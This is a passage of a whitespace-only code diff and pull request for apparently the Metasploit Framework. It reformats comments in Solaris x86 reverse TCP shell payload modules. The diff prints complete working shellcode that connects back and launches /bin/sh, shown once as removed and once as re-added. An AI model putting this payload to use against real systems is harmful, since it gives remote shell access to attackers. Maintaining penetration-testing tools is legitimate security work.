+            "\x50"                 + #   pushl   %eax                       #
+            "\x51"                 + #   pushl   %ecx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
+            "\xff\xd6"               #   call    *%esi                      #
         }
       ))
   end

--- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
@@ -33,50 +33,50 @@ module MetasploitModule
               'LPORT'    => [ 21, 'n'    ],
             },
           'Payload' =>
-            "\x68\xff\xd8\xff\x3c" +#   pushl   $0x3cffd8ff                #
-            "\x6a\x65"             +#   pushl   $0x65                      #
-            "\x89\xe6"             +#   movl    %esp,%esi                  #
-            "\xf7\x56\x04"         +#   notl    0x04(%esi)                 #
-            "\xf6\x16"             +#   notb    (%esi)                     #
-            "\x68\x7f\x01\x01\x01" +#   pushl   $0x0101017f                #
-            "\x66\x68\x04\xd2"     +#   pushw   $0xd204                    #
-            "\x66\x6a\x02"         +#   pushw   $0x02                      #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\xb0\xe6"             +#   movb    $0xe6,%al                  #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\xb0\xeb"             +#   movb    $0xeb,%al                  #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\x5b"                 +#   popl    %ebx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x6a\x09"             +#   pushl   $0x09                      #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x6a\x3e"             +#   pushl   $0x3e                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\xff\x4f\xe0"         +#   decl    -0x20(%edi)                #
-            "\x79\xf6"             +#   jns     <cntsockcode+57>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x51"                 +#   pushl   %ecx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
-            "\xff\xd6"              #   call    *%esi                      #
+            "\x68\xff\xd8\xff\x3c" + #   pushl   $0x3cffd8ff                #
+            "\x6a\x65"             + #   pushl   $0x65                      #
+            "\x89\xe6"             + #   movl    %esp,%esi                  #
+            "\xf7\x56\x04"         + #   notl    0x04(%esi)                 #
+            "\xf6\x16"             + #   notb    (%esi)                     #
+            "\x68\x7f\x01\x01\x01" + #   pushl   $0x0101017f                #
+            "\x66\x68\x04\xd2"     + #   pushw   $0xd204                    #
+            "\x66\x6a\x02"         + #   pushw   $0x02                      #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\xb0\xe6"             + #   movb    $0xe6,%al                  #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\xb0\xeb"             + #   movb    $0xeb,%al                  #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\x5b"                 + #   popl    %ebx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x6a\x09"             + #   pushl   $0x09                      #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x6a\x3e"             + #   pushl   $0x3e                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\xff\x4f\xe0"         + #   decl    -0x20(%edi)                #
+            "\x79\xf6"             + #   jns     <cntsockcode+57>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x51"                 + #   pushl   %ecx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
+            "\xff\xd6"               #   call    *%esi                      #
         }
       ))
   end


### PR DESCRIPTION
This is a whitespace-only diff (add ?w=1 to the URL) that cleans up about 25% of the warning volume from 'ruby -W2'. Just cleaning up the noise so it's possible to see the more important warnings.

## Verification

- [ ] This should get caught entirely by rspec if there is any deviation. It's just adding a space between comments and the last operator on the line.

Before:
```
$ ruby -W2 ./msfconsole -qx 'quit' 2> warnings.txt && wc -l warnings.txt
    9677 warnings.txt
```

After:
```
$ ruby -W2 ./msfconsole -qx 'quit' 2> warnings.txt && wc -l warnings.txt
    7369 warnings.txt
```
